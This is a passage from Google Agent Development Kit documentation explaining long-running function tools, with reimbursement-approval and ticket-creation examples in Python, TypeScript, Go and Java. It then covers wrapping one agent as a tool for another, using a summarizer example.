wrap a function with `LongRunningFunctionTool`. In Java, you pass a Method name to `LongRunningFunctionTool.create()`. In TypeScript, you instantiate the `LongRunningFunctionTool` class. 1. **Initiation:** When the LLM calls the tool, your function starts the long-running operation. 1. **Initial Updates:** Your function should optionally return an initial result (e.g. the long-running operation id). The ADK framework takes the result and sends it back to the LLM packaged within a `FunctionResponse`. This allows the LLM to inform the user (e.g., status, percentage complete, messages). And then the agent run is ended / paused. 1. **Continue or Wait:** After each agent run is completed. Agent client can query the progress of the long-running operation and decide whether to continue the agent run with an intermediate response (to update the progress) or wait until a final response is retrieved. Agent client should send the intermediate or final response back to the agent for the next run. 1. **Framework Handling:** The ADK framework manages the execution. It sends the intermediate or final `FunctionResponse` sent by agent client to the LLM to generate a user friendly message. ### Creating the Tool Define your tool function and wrap it using the `LongRunningFunctionTool` class: ```python # 1. Define the long running function def ask_for_approval( purpose: str, amount: float ) -> dict[str, Any]: """Ask for approval for the reimbursement.""" # create a ticket for the approval # Send a notification to the approver with the link of the ticket return {'status': 'pending', 'approver': 'Sean Zhou', 'purpose' : purpose, 'amount': amount, 'ticket-id': 'approval-ticket-1'} def reimburse(purpose: str, amount: float) -> str: """Reimburse the amount of money to the employee.""" # send the reimbrusement request to payment vendor return {'status': 'ok'} # 2. Wrap the function with LongRunningFunctionTool long_running_tool = LongRunningFunctionTool(func=ask_for_approval) ``` ```typescript // 1. Define the long-running function function askForApproval(args: {purpose: string; amount: number}) { /** * Ask for approval for the reimbursement. */ // create a ticket for the approval // Send a notification to the approver with the link of the ticket return { "status": "pending", "approver": "Sean Zhou", "purpose": args.purpose, "amount": args.amount, "ticket-id": "approval-ticket-1", }; } // 2. Instantiate the LongRunningFunctionTool class with the long-running function const longRunningTool = new LongRunningFunctionTool({ name: "ask_for_approval", description: "Ask for approval for the reimbursement.", parameters: z.object({ purpose: z.string().describe("The purpose of the reimbursement."), amount: z.number().describe("The amount to reimburse."), }), execute: askForApproval, }); ``` ```go import ( "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/model/gemini" "google.golang.org/adk/tool" "google.golang.org/adk/tool/functiontool" "google.golang.org/genai" ) // CreateTicketArgs defines the arguments for our long-running tool. type CreateTicketArgs struct { Urgency string `json:"urgency" jsonschema:"The urgency level of the ticket."` } // CreateTicketResults defines the *initial* output of our long-running tool. type CreateTicketResults struct { Status string `json:"status"` TicketId string `json:"ticket_id"` } // createTicketAsync simulates the *initiation* of a long-running ticket creation task. func createTicketAsync(ctx tool.Context, args CreateTicketArgs) (CreateTicketResults, error) { log.Printf("TOOL_EXEC: 'create_ticket_long_running' called with urgency: %s (Call ID: %s)\n", args.Urgency, ctx.FunctionCallID()) // "Generate" a ticket ID and return it in the initial response. ticketID := "TICKET-ABC-123" log.Printf("ACTION: Generated Ticket ID: %s for Call ID: %s\n", ticketID, ctx.FunctionCallID()) // In a real application, you would save the association between the // FunctionCallID and the ticketID to handle the async response later. return CreateTicketResults{ Status: "started", TicketId: ticketID, }, nil } func createTicketAgent(ctx context.Context) (agent.Agent, error) { ticketTool, err := functiontool.New( functiontool.Config{ Name: "create_ticket_long_running", Description: "Creates a new support ticket with a specified urgency level.", }, createTicketAsync, ) if err != nil { return nil, fmt.Errorf("failed to create long running tool: %w", err) } model, err := gemini.NewModel(ctx, "gemini-2.5-flash", &genai.ClientConfig{}) if err != nil { return nil, fmt.Errorf("failed to create model: %v", err) } return llmagent.New(llmagent.Config{ Name: "ticket_agent", Model: model, Instruction: "You are a helpful assistant for creating support tickets. Provide the status of the ticket at each interaction.", Tools: []tool.Tool{ticketTool}, }) } ``` ```java import com.google.adk.agents.LlmAgent; import com.google.adk.tools.LongRunningFunctionTool; import java.util.HashMap; import java.util.Map; public class ExampleLongRunningFunction { // Define your Long Running function. // Ask for approval for the reimbursement. public static Map askForApproval(String purpose, double amount) { // Simulate creating a ticket and sending a notification System.out.println( "Simulating ticket creation for purpose: " + purpose + ", amount: " + amount); // Send a notification to the approver with the link of the ticket Map result = new HashMap<>(); result.put("status", "pending"); result.put("approver", "Sean Zhou"); result.put("purpose", purpose); result.put("amount", amount); result.put("ticket-id", "approval-ticket-1"); return result; } public static void main(String[] args) throws NoSuchMethodException { // Pass the method to LongRunningFunctionTool.create LongRunningFunctionTool approveTool = LongRunningFunctionTool.create(ExampleLongRunningFunction.class, "askForApproval"); // Include the tool in the agent LlmAgent approverAgent = LlmAgent.builder() // ... .tools(approveTool) .build(); } } ``` ### Intermediate / Final result Updates Agent client received an event with long running function calls and check the status of the ticket. Then Agent client can send the intermediate or final response back to update the progress. The framework packages this value (even if it's None) into the content of the `FunctionResponse` sent back to the LLM. Note: Long running function response with Resume feature If your ADK agent workflow is configured with the [Resume](/adk-docs/runtime/resume/) feature, you also must include the Invocation ID (`invocation_id`) parameter with the long running function response. The Invocation ID you provide must be the same invocation that generated the long running function request, otherwise the system starts a new invocation with the response. If your agent uses the Resume feature, consider including the Invocation ID as a parameter with your long running function request, so it can be included with the response. For more details on using the Resume feature, see [Resume stopped agents](/adk-docs/runtime/resume/). Applies to only Java ADK When passing `ToolContext` with Function Tools, ensure that one of the following is true: - The Schema is passed with the ToolContext parameter in the function signature, like: ```text @com.google.adk.tools.Annotations.Schema(name = "toolContext") ToolContext toolContext ``` OR - The following `-parameters` flag is set to the mvn compiler plugin ```text org.apache.maven.plugins maven-compiler-plugin 3.14.0 -parameters ``` This constraint is temporary and will be removed. ```python # Agent Interaction async def call_agent_async(query): def get_long_running_function_call(event: Event) -> types.FunctionCall: # Get the long running function call from the event if not event.long_running_tool_ids or not event.content or not event.content.parts: return for part in event.content.parts: if ( part and part.function_call and event.long_running_tool_ids and part.function_call.id in event.long_running_tool_ids ): return part.function_call def get_function_response(event: Event, function_call_id: str) -> types.FunctionResponse: # Get the function response for the fuction call with specified id. if not event.content or not event.content.parts: return for part in event.content.parts: if ( part and part.function_response and part.function_response.id == function_call_id ): return part.function_response content = types.Content(role='user', parts=[types.Part(text=query)]) session, runner = await setup_session_and_runner() print("\nRunning agent...") events_async = runner.run_async( session_id=session.id, user_id=USER_ID, new_message=content ) long_running_function_call, long_running_function_response, ticket_id = None, None, None async for event in events_async: # Use helper to check for the specific auth request event if not long_running_function_call: long_running_function_call = get_long_running_function_call(event) else: _potential_response = get_function_response(event, long_running_function_call.id) if _potential_response: # Only update if we get a non-None response long_running_function_response = _potential_response ticket_id = long_running_function_response.response['ticket-id'] if event.content and event.content.parts: if text := ''.join(part.text or '' for part in event.content.parts): print(f'[{event.author}]: {text}') if long_running_function_response: # query the status of the correpsonding ticket via tciket_id # send back an intermediate / final response updated_response = long_running_function_response.model_copy(deep=True) updated_response.response = {'status': 'approved'} async for event in runner.run_async( session_id=session.id, user_id=USER_ID, new_message=types.Content(parts=[types.Part(function_response = updated_response)], role='user') ): if event.content and event.content.parts: if text := ''.join(part.text or '' for part in event.content.parts): print(f'[{event.author}]: {text}') ``` ```typescript /** * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ import { LlmAgent, Runner, FunctionTool, LongRunningFunctionTool, InMemorySessionService, Event, stringifyContent, } from "@google/adk"; import {z} from "zod"; import {Content, FunctionCall, FunctionResponse, createUserContent} from "@google/genai"; // 1. Define the long-running function function askForApproval(args: {purpose: string; amount: number}) { /** * Ask for approval for the reimbursement. */ // create a ticket for the approval // Send a notification to the approver with the link of the ticket return { "status": "pending", "approver": "Sean Zhou", "purpose": args.purpose, "amount": args.amount, "ticket-id": "approval-ticket-1", }; } // 2. Instantiate the LongRunningFunctionTool class with the long-running function const longRunningTool = new LongRunningFunctionTool({ name: "ask_for_approval", description: "Ask for approval for the reimbursement.", parameters: z.object({ purpose: z.string().describe("The purpose of the reimbursement."), amount: z.number().describe("The amount to reimburse."), }), execute: askForApproval, }); function reimburse(args: {purpose: string; amount: number}) { /** * Reimburse the amount of money to the employee. */ // send the reimbursement request to payment vendor return {status: "ok"}; } const reimburseTool = new FunctionTool({ name: "reimburse", description: "Reimburse the amount of money to the employee.", parameters: z.object({ purpose: z.string().describe("The purpose of the reimbursement."), amount: z.number().describe("The amount to reimburse."), }), execute: reimburse, }); // 3. Use the tool in an Agent const reimbursementAgent = new LlmAgent({ model: "gemini-2.5-flash", name: "reimbursement_agent", instruction: ` You are an agent whose job is to handle the reimbursement process for the employees. If the amount is less than $100, you will automatically approve the reimbursement. If the amount is greater than $100, you will ask for approval from the manager. If the manager approves, you will call reimburse() to reimburse the amount to the employee. If the manager rejects, you will inform the employee of the rejection. `, tools: [reimburseTool, longRunningTool], }); const APP_NAME = "human_in_the_loop"; const USER_ID = "1234"; const SESSION_ID = "session1234"; // Session and Runner async function setupSessionAndRunner() { const sessionService = new InMemorySessionService(); const session = await sessionService.createSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_ID, }); const runner = new Runner({ agent: reimbursementAgent, appName: APP_NAME, sessionService: sessionService, }); return {session, runner}; } function getLongRunningFunctionCall(event: Event): FunctionCall | undefined { // Get the long-running function call from the event if ( !event.longRunningToolIds || !event.content || !event.content.parts?.length ) { return; } for (const part of event.content.parts) { if ( part && part.functionCall && event.longRunningToolIds && part.functionCall.id && event.longRunningToolIds.includes(part.functionCall.id) ) { return part.functionCall; } } } function getFunctionResponse( event: Event, functionCallId: string ): FunctionResponse | undefined { // Get the function response for the function call with specified id. if (!event.content || !event.content.parts?.length) { return; } for (const part of event.content.parts) { if ( part && part.functionResponse && part.functionResponse.id === functionCallId ) { return part.functionResponse; } } } // Agent Interaction async function callAgentAsync(query: string) { let longRunningFunctionCall: FunctionCall | undefined; let longRunningFunctionResponse: FunctionResponse | undefined; let ticketId: string | undefined; const content: Content = createUserContent(query); const {session, runner} = await setupSessionAndRunner(); console.log("\nRunning agent..."); const events = runner.runAsync({ sessionId: session.id, userId: USER_ID, newMessage: content, }); for await (const event of events) { // Use helper to check for the specific auth request event if (!longRunningFunctionCall) { longRunningFunctionCall = getLongRunningFunctionCall(event); } else { const _potentialResponse = getFunctionResponse( event, longRunningFunctionCall.id! ); if (_potentialResponse) { // Only update if we get a non-None response longRunningFunctionResponse = _potentialResponse; ticketId = ( longRunningFunctionResponse.response as {[key: string]: any} )[`ticket-id`]; } } const text = stringifyContent(event); if (text) { console.log(`[${event.author}]: ${text}`); } } if (longRunningFunctionResponse) { // query the status of the corresponding ticket via ticket_id // send back an intermediate / final response const updatedResponse = JSON.parse( JSON.stringify(longRunningFunctionResponse) ); updatedResponse.response = {status: "approved"}; for await (const event of runner.runAsync({ sessionId: session.id, userId: USER_ID, newMessage: createUserContent(JSON.stringify({functionResponse: updatedResponse})), })) { const text = stringifyContent(event); if (text) { console.log(`[${event.author}]: ${text}`); } } } } async function main() { // reimbursement that doesn't require approval await callAgentAsync("Please reimburse 50$ for meals"); // reimbursement that requires approval await callAgentAsync("Please reimburse 200$ for meals"); } main(); ``` The following example demonstrates a multi-turn workflow. First, the user asks the agent to create a ticket. The agent calls the long-running tool and the client captures the `FunctionCall` ID. The client then simulates the asynchronous work completing by sending subsequent `FunctionResponse` messages back to the agent to provide the ticket ID and final status. ```go // runTurn executes a single turn with the agent and returns the captured function call ID. func runTurn(ctx context.Context, r *runner.Runner, sessionID, turnLabel string, content *genai.Content) string { var funcCallID atomic.Value // Safely store the found ID. fmt.Printf("\n--- %s ---\n", turnLabel) for event, err := range r.Run(ctx, userID, sessionID, content, agent.RunConfig{ StreamingMode: agent.StreamingModeNone, }) { if err != nil { fmt.Printf("\nAGENT_ERROR: %v\n", err) continue } // Print a summary of the event for clarity. printEventSummary(event, turnLabel) // Capture the function call ID from the event. for _, part := range event.Content.Parts { if fc := part.FunctionCall; fc != nil { if fc.Name == "create_ticket_long_running" { funcCallID.Store(fc.ID) } } } } if id, ok := funcCallID.Load().(string); ok { return id } return "" } func main() { ctx := context.Background() ticketAgent, err := createTicketAgent(ctx) if err != nil { log.Fatalf("Failed to create agent: %v", err) } // Setup the runner and session. sessionService := session.InMemoryService() session, err := sessionService.Create(ctx, &session.CreateRequest{AppName: appName, UserID: userID}) if err != nil { log.Fatalf("Failed to create session: %v", err) } r, err := runner.New(runner.Config{AppName: appName, Agent: ticketAgent, SessionService: sessionService}) if err != nil { log.Fatalf("Failed to create runner: %v", err) } // --- Turn 1: User requests to create a ticket. --- initialUserMessage := genai.NewContentFromText("Create a high urgency ticket for me.", genai.RoleUser) funcCallID := runTurn(ctx, r, session.Session.ID(), "Turn 1: User Request", initialUserMessage) if funcCallID == "" { log.Fatal("ERROR: Tool 'create_ticket_long_running' not called in Turn 1.") } fmt.Printf("ACTION: Captured FunctionCall ID: %s\n", funcCallID) // --- Turn 2: App provides the final status of the ticket. --- // In a real application, the ticketID would be retrieved from a database // using the funcCallID. For this example, we'll use the same ID. ticketID := "TICKET-ABC-123" willContinue := false // Signal that this is the final response. ticketStatusResponse := &genai.FunctionResponse{ Name: "create_ticket_long_running", ID: funcCallID, Response: map[string]any{ "status": "approved", "ticket_id": ticketID, }, WillContinue: &willContinue, } appResponseWithStatus := &genai.Content{ Role: string(genai.RoleUser), Parts: []*genai.Part{{FunctionResponse: ticketStatusResponse}}, } runTurn(ctx, r, session.Session.ID(), "Turn 2: App provides ticket status", appResponseWithStatus) fmt.Println("Long running function completed successfully.") } // printEventSummary provides a readable log of agent and LLM interactions. func printEventSummary(event *session.Event, turnLabel string) { for _, part := range event.Content.Parts { // Check for a text part. if part.Text != "" { fmt.Printf("[%s][%s_TEXT]: %s\n", turnLabel, event.Author, part.Text) } // Check for a function call part. if fc := part.FunctionCall; fc != nil { fmt.Printf("[%s][%s_CALL]: %s(%v) ID: %s\n", turnLabel, event.Author, fc.Name, fc.Args, fc.ID) } } } ``` ```java import com.google.adk.agents.LlmAgent; import com.google.adk.events.Event; import com.google.adk.runner.InMemoryRunner; import com.google.adk.runner.Runner; import com.google.adk.sessions.Session; import com.google.adk.tools.Annotations.Schema; import com.google.adk.tools.LongRunningFunctionTool; import com.google.adk.tools.ToolContext; import com.google.common.collect.ImmutableList; import com.google.common.collect.ImmutableMap; import com.google.genai.types.Content; import com.google.genai.types.FunctionCall; import com.google.genai.types.FunctionResponse; import com.google.genai.types.Part; import java.util.Optional; import java.util.UUID; import java.util.concurrent.atomic.AtomicReference; import java.util.stream.Collectors; public class LongRunningFunctionExample { private static String USER_ID = "user123"; @Schema( name = "create_ticket_long_running", description = """ Creates a new support ticket with a specified urgency level. Examples of urgency are 'high', 'medium', or 'low'. The ticket creation is a long-running process, and its ID will be provided when ready. """) public static void createTicketAsync( @Schema( name = "urgency", description = "The urgency level for the new ticket, such as 'high', 'medium', or 'low'.") String urgency, @Schema(name = "toolContext") // Ensures ADK injection ToolContext toolContext) { System.out.printf( "TOOL_EXEC: 'create_ticket_long_running' called with urgency: %s (Call ID: %s)%n", urgency, toolContext.functionCallId().orElse("N/A")); } public static void main(String[] args) { LlmAgent agent = LlmAgent.builder() .name("ticket_agent") .description("Agent for creating tickets via a long-running task.") .model("gemini-2.0-flash") .tools( ImmutableList.of( LongRunningFunctionTool.create( LongRunningFunctionExample.class, "createTicketAsync"))) .build(); Runner runner = new InMemoryRunner(agent); Session session = runner.sessionService().createSession(agent.name(), USER_ID, null, null).blockingGet(); // --- Turn 1: User requests ticket --- System.out.println("\n--- Turn 1: User Request ---"); Content initialUserMessage = Content.fromParts(Part.fromText("Create a high urgency ticket for me.")); AtomicReference funcCallIdRef = new AtomicReference<>(); runner .runAsync(USER_ID, session.id(), initialUserMessage) .blockingForEach( event -> { printEventSummary(event, "T1"); if (funcCallIdRef.get() == null) { // Capture the first relevant function call ID event.content().flatMap(Content::parts).orElse(ImmutableList.of()).stream() .map(Part::functionCall) .flatMap(Optional::stream) .filter(fc -> "create_ticket_long_running".equals(fc.name().orElse(""))) .findFirst() .flatMap(FunctionCall::id) .ifPresent(funcCallIdRef::set); } }); if (funcCallIdRef.get() == null) { System.out.println("ERROR: Tool 'create_ticket_long_running' not called in Turn 1."); return; } System.out.println("ACTION: Captured FunctionCall ID: " + funcCallIdRef.get()); // --- Turn 2: App provides initial ticket_id (simulating async tool completion) --- System.out.println("\n--- Turn 2: App provides ticket_id ---"); String ticketId = "TICKET-" + UUID.randomUUID().toString().substring(0, 8).toUpperCase(); FunctionResponse ticketCreatedFuncResponse = FunctionResponse.builder() .name("create_ticket_long_running") .id(funcCallIdRef.get()) .response(ImmutableMap.of("ticket_id", ticketId)) .build(); Content appResponseWithTicketId = Content.builder() .parts( ImmutableList.of( Part.builder().functionResponse(ticketCreatedFuncResponse).build())) .role("user") .build(); runner .runAsync(USER_ID, session.id(), appResponseWithTicketId) .blockingForEach(event -> printEventSummary(event, "T2")); System.out.println("ACTION: Sent ticket_id " + ticketId + " to agent."); // --- Turn 3: App provides ticket status update --- System.out.println("\n--- Turn 3: App provides ticket status ---"); FunctionResponse ticketStatusFuncResponse = FunctionResponse.builder() .name("create_ticket_long_running") .id(funcCallIdRef.get()) .response(ImmutableMap.of("status", "approved", "ticket_id", ticketId)) .build(); Content appResponseWithStatus = Content.builder() .parts( ImmutableList.of(Part.builder().functionResponse(ticketStatusFuncResponse).build())) .role("user") .build(); runner .runAsync(USER_ID, session.id(), appResponseWithStatus) .blockingForEach(event -> printEventSummary(event, "T3_FINAL")); System.out.println("Long running function completed successfully."); } private static void printEventSummary(Event event, String turnLabel) { event .content() .ifPresent( content -> { String text = content.parts().orElse(ImmutableList.of()).stream() .map(part -> part.text().orElse("")) .filter(s -> !s.isEmpty()) .collect(Collectors.joining(" ")); if (!text.isEmpty()) { System.out.printf("[%s][%s_TEXT]: %s%n", turnLabel, event.author(), text); } content.parts().orElse(ImmutableList.of()).stream() .map(Part::functionCall) .flatMap(Optional::stream) .findFirst() // Assuming one function call per relevant event for simplicity .ifPresent( fc -> System.out.printf( "[%s][%s_CALL]: %s(%s) ID: %s%n", turnLabel, event.author(), fc.name().orElse("N/A"), fc.args().orElse(ImmutableMap.of()), fc.id().orElse("N/A"))); }); } } ``` Python complete example: File Processing Simulation ```python # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import asyncio from typing import Any from google.adk.agents import Agent from google.adk.events import Event from google.adk.runners import Runner from google.adk.tools import LongRunningFunctionTool from google.adk.sessions import InMemorySessionService from google.genai import types # 1. Define the long running function def ask_for_approval( purpose: str, amount: float ) -> dict[str, Any]: """Ask for approval for the reimbursement.""" # create a ticket for the approval # Send a notification to the approver with the link of the ticket return {'status': 'pending', 'approver': 'Sean Zhou', 'purpose' : purpose, 'amount': amount, 'ticket-id': 'approval-ticket-1'} def reimburse(purpose: str, amount: float) -> str: """Reimburse the amount of money to the employee.""" # send the reimbrusement request to payment vendor return {'status': 'ok'} # 2. Wrap the function with LongRunningFunctionTool long_running_tool = LongRunningFunctionTool(func=ask_for_approval) # 3. Use the tool in an Agent file_processor_agent = Agent( # Use a model compatible with function calling model="gemini-2.0-flash", name='reimbursement_agent', instruction=""" You are an agent whose job is to handle the reimbursement process for the employees. If the amount is less than $100, you will automatically approve the reimbursement. If the amount is greater than $100, you will ask for approval from the manager. If the manager approves, you will call reimburse() to reimburse the amount to the employee. If the manager rejects, you will inform the employee of the rejection. """, tools=[reimburse, long_running_tool] ) APP_NAME = "human_in_the_loop" USER_ID = "1234" SESSION_ID = "session1234" # Session and Runner async def setup_session_and_runner(): session_service = InMemorySessionService() session = await session_service.create_session(app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID) runner = Runner(agent=file_processor_agent, app_name=APP_NAME, session_service=session_service) return session, runner # Agent Interaction async def call_agent_async(query): def get_long_running_function_call(event: Event) -> types.FunctionCall: # Get the long running function call from the event if not event.long_running_tool_ids or not event.content or not event.content.parts: return for part in event.content.parts: if ( part and part.function_call and event.long_running_tool_ids and part.function_call.id in event.long_running_tool_ids ): return part.function_call def get_function_response(event: Event, function_call_id: str) -> types.FunctionResponse: # Get the function response for the fuction call with specified id. if not event.content or not event.content.parts: return for part in event.content.parts: if ( part and part.function_response and part.function_response.id == function_call_id ): return part.function_response content = types.Content(role='user', parts=[types.Part(text=query)]) session, runner = await setup_session_and_runner() print("\nRunning agent...") events_async = runner.run_async( session_id=session.id, user_id=USER_ID, new_message=content ) long_running_function_call, long_running_function_response, ticket_id = None, None, None async for event in events_async: # Use helper to check for the specific auth request event if not long_running_function_call: long_running_function_call = get_long_running_function_call(event) else: _potential_response = get_function_response(event, long_running_function_call.id) if _potential_response: # Only update if we get a non-None response long_running_function_response = _potential_response ticket_id = long_running_function_response.response['ticket-id'] if event.content and event.content.parts: if text := ''.join(part.text or '' for part in event.content.parts): print(f'[{event.author}]: {text}') if long_running_function_response: # query the status of the correpsonding ticket via tciket_id # send back an intermediate / final response updated_response = long_running_function_response.model_copy(deep=True) updated_response.response = {'status': 'approved'} async for event in runner.run_async( session_id=session.id, user_id=USER_ID, new_message=types.Content(parts=[types.Part(function_response = updated_response)], role='user') ): if event.content and event.content.parts: if text := ''.join(part.text or '' for part in event.content.parts): print(f'[{event.author}]: {text}') # Note: In Colab, you can directly use 'await' at the top level. # If running this code as a standalone Python script, you'll need to use asyncio.run() or manage the event loop. # reimbursement that doesn't require approval # asyncio.run(call_agent_async("Please reimburse 50$ for meals")) await call_agent_async("Please reimburse 50$ for meals") # For Notebooks, uncomment this line and comment the above line # reimbursement that requires approval # asyncio.run(call_agent_async("Please reimburse 200$ for meals")) await call_agent_async("Please reimburse 200$ for meals") # For Notebooks, uncomment this line and comment the above line ``` #### Key aspects of this example - **`LongRunningFunctionTool`**: Wraps the supplied method/function; the framework handles sending yielded updates and the final return value as sequential FunctionResponses. - **Agent instruction**: Directs the LLM to use the tool and understand the incoming FunctionResponse stream (progress vs. completion) for user updates. - **Final return**: The function returns the final result dictionary, which is sent in the concluding FunctionResponse to indicate completion. ## Agent-as-a-Tool This powerful feature allows you to leverage the capabilities of other agents within your system by calling them as tools. The Agent-as-a-Tool enables you to invoke another agent to perform a specific task, effectively **delegating responsibility**. This is conceptually similar to creating a Python function that calls another agent and uses the agent's response as the function's return value. ### Key difference from sub-agents It's important to distinguish an Agent-as-a-Tool from a Sub-Agent. - **Agent-as-a-Tool:** When Agent A calls Agent B as a tool (using Agent-as-a-Tool), Agent B's answer is **passed back** to Agent A, which then summarizes the answer and generates a response to the user. Agent A retains control and continues to handle future user input. - **Sub-agent:** When Agent A calls Agent B as a sub-agent, the responsibility of answering the user is completely **transferred to Agent B**. Agent A is effectively out of the loop. All subsequent user input will be answered by Agent B. ### Usage To use an agent as a tool, wrap the agent with the AgentTool class. ```python tools=[AgentTool(agent=agent_b)] ``` ```typescript tools: [new AgentTool({agent: agentB})] ``` ```go agenttool.New(agent, &agenttool.Config{...}) ``` ```java AgentTool.create(agent) ``` ### Customization The `AgentTool` class provides the following attributes for customizing its behavior: - **skip_summarization: bool:** If set to True, the framework will **bypass the LLM-based summarization** of the tool agent's response. This can be useful when the tool's response is already well-formatted and requires no further processing. Example ```python # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from google.adk.agents import Agent from google.adk.runners import Runner from google.adk.sessions import InMemorySessionService from google.adk.tools.agent_tool import AgentTool from google.genai import types APP_NAME="summary_agent" USER_ID="user1234" SESSION_ID="1234" summary_agent = Agent( model="gemini-2.0-flash", name="summary_agent", instruction="""You are an expert summarizer. Please read the following text and provide a concise summary.""", description="Agent to summarize text", ) root_agent = Agent( model='gemini-2.0-flash', name='root_agent', instruction="""You are a helpful assistant. When the user provides a text, use the 'summarize' tool to generate a summary. Always forward the user's message exactly as received to the 'summarize' tool, without modifying or summarizing it yourself. Present the response from the tool to the user.""", tools=[AgentTool(agent=summary_agent, skip_summarization=True)] ) # Session and Runner async def setup_session_and_runner(): session_service = InMemorySessionService() session = await session_service.create_session(app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID) runner = Runner(agent=root_agent, app_name=APP_NAME, session_service=session_service) return session, runner # Agent Interaction async def call_agent_async(query): content = types.Content(role='user', parts=[types.Part(text=query)]) session, runner = await setup_session_and_runner() events = runner.run_async(user_id=USER_ID, session_id=SESSION_ID, new_message=content) async for event in events: if event.is_final_response(): final_response = event.content.parts[0].text print("Agent Response: ", final_response) long_text = """Quantum computing represents a fundamentally different approach to computation, leveraging the bizarre principles of quantum mechanics to process information. Unlike classical computers that rely on bits representing either 0 or 1, quantum computers use qubits which can exist in a state of superposition - effectively being 0, 1, or a combination of both simultaneously. Furthermore, qubits can become entangled, meaning their fates are intertwined regardless of distance, allowing for complex correlations. This parallelism and interconnectedness grant quantum computers the potential to solve specific types of incredibly complex problems - such as drug discovery, materials science, complex system optimization, and breaking certain types of cryptography - far faster than even the most powerful classical supercomputers could ever achieve, although the technology is still largely in its developmental stages.""" # Note: In Colab, you can directly use 'await' at the top level. # If running this code as a standalone Python script, you'll need to use asyncio.run() or manage the event loop. await call_agent_async(long_text) ``` ```typescript /** * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ import { AgentTool, InMemoryRunner, LlmAgent, } from '@google/adk'; import {Part, createUserContent} from '@google/genai'; /** * This example demonstrates how to use an agent as a tool. */ async function main() { // Define the summarization agent that will be used as a tool const summaryAgent = new LlmAgent({ name: 'summary_agent', model: 'gemini-2.5-flash', description: 'Agent to summarize text', instruction: 'You are an expert summarizer. Please read the following text and provide a concise summary.', }); // Define the main agent that uses the summarization agent as a tool. // skipSummarization is set to true, so the main_agent will directly output // the result from the summary_agent without further processing. const mainAgent = new LlmAgent({ name: 'main_agent', model: 'gemini-2.5-flash', instruction: "You are a helpful assistant. When the user provides a text, use the 'summary_agent' tool to generate a summary. Always forward the user's message exactly as received to the 'summary_agent' tool, without modifying or summarizing it yourself. Present the response from the tool to the user.", tools: [new AgentTool({agent: summaryAgent, skipSummarization: true})], }); const appName = 'agent-as-a-tool-app'; const runner = new InMemoryRunner({agent: mainAgent, appName}); const longText = `Quantum computing represents a fundamentally different approach to computation, leveraging the bizarre principles of quantum mechanics to process information. Unlike classical computers that rely on bits representing either 0 or 1, quantum computers use qubits which can exist in a state of superposition - effectively being 0, 1, or a combination of both simultaneously. Furthermore, qubits can become entangled, meaning their fates are intertwined regardless of distance, allowing for complex correlations. This parallelism and interconnectedness grant quantum computers the potential to solve specific types of incredibly complex problems - such as drug discovery, materials science, complex system optimization, and breaking certain types of cryptography - far faster than even the most powerful classical supercomputers could ever achieve, although the technology is still largely in its developmental stages.`; // Create the session before running the agent await runner.sessionService.createSession({ appName, userId: 'user1', sessionId: 'session1', }); // Run the agent with the long text to summarize const events = runner.runAsync({ userId: 'user1', sessionId: 'session1', newMessage: createUserContent(longText), }); // Print the final response from the agent console.log('Agent Response:'); for await (const event of events) { if (event.content?.parts?.length) { const responsePart = event.content.parts.find((p: Part) => p.functionResponse); if (responsePart && responsePart.functionResponse) { console.log(responsePart.functionResponse.response); } } } } main(); ``` ```go import ( "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/model/gemini" "google.golang.org/adk/tool" "google.golang.org/adk/tool/agenttool" "google.golang.org/genai" ) // createSummarizerAgent creates an agent whose sole purpose is to summarize text. func createSummarizerAgent(ctx context.Context) (agent.Agent, error) { model, err := gemini.NewModel(ctx, "gemini-2.5-flash", &genai.ClientConfig{}) if err != nil { return nil, err } return llmagent.New(llmagent.Config{ Name: "SummarizerAgent", Model: model, Instruction: "You are an expert at summarizing text. Take the user's input and provide a concise summary.", Description: "An agent that summarizes text.", }) } // createMainAgent creates the primary agent that will use the summarizer agent as a tool. func createMainAgent(ctx context.Context, tools ...tool.Tool) (agent.Agent, error) { model, err := gemini.NewModel(ctx, "gemini-2.5-flash", &genai.ClientConfig{}) if err != nil { return nil, err } return llmagent.New(llmagent.Config{ Name: "MainAgent", Model: model, Instruction: "You are a helpful assistant. If you are asked to summarize a long text, use the 'summarize' tool. " + "After getting the summary, present it to the user by saying 'Here is a summary of the text:'.", Description: "The main agent that can delegate tasks.", Tools: tools, }) } func RunAgentAsToolSimulation() { ctx := context.Background() // 1. Create the Tool Agent (Summarizer) summarizerAgent, err := createSummarizerAgent(ctx) if err != nil { log.Fatalf("Failed to create summarizer agent: %v", err) } // 2. Wrap the Tool Agent in an AgentTool summarizeTool := agenttool.New(summarizerAgent, &agenttool.Config{ SkipSummarization: true, }) // 3. Create the Main Agent and provide it with the AgentTool mainAgent, err := createMainAgent(ctx, summarizeTool) if err != nil { log.Fatalf("Failed to 